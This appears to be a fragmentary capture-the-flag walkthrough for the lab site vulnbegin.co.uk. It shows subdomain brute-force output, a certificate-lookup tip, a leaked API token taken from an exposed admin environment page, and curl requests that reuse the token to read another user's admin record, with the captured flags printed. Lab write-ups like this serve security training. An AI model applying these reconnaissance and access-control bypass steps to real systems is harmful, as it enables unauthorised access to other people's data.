[*] Performing host and subdomain brute force against vulnbegin.co.uk[*] A server.vulnbegin.co.uk 68.183.255.206[*] A www.vulnbegin.co.uk 68.183.255.206[+] 2 Records Found
{"error":"User Not Authenticated","flag":"[^FLAG^E858ED9649E57BECE9ACD1A4C60D3446^FLAG^]"}%
SSL Certificate Records
A great resource for these SSL records is crt.sh if you visit https://crt.sh/?q=vulnbegin.co.uk you'll be able to see records of SSL certificates that have been registered for vulnbegin.co.uk
Visiting http://www.vulnbegin.co.uk/cpadmin/env we find the flag and a probably interesting header X-Token for the api {"api_key":"X-Token: 492E64385D3779BC5F040E2B19D67742","flag":"[^FLAG^F6A691584431F9F2C29A3A2DE85A2210^FLAG^]"}
curl-H"X-Token: 492E64385D3779BC5F040E2B19D67742"-H"Cookie: ctfchallenge=CENSORED"http://server.vulnbegin.co.uk/user/27/info{"id":27,"username":"vulnbegin_website","description":"User for the main website","flag":"[^FLAG^7B3A24F3368E71842ED7053CF1E51BB0^FLAG^]"}%
curl-H"X-Token: 492E64385D3779BC5F040E2B19D67742"-H"Cookie: ctfchallenge=CENSORED"http://server.vulnbegin.co.uk/user/5["You do not have permission to view this user"]
curl-H"X-Token: 492E64385D3779BC5F040E2B19D67742"-H"Cookie: ctfchallenge=CENSORED"http://server.vulnbegin.co.uk/user/5/info{"id":5,"username":"admin","description":"admin for the server","flag":"[^FLAG^3D82BE780F46EE86CE060D23E6E80639^FLAG^]"}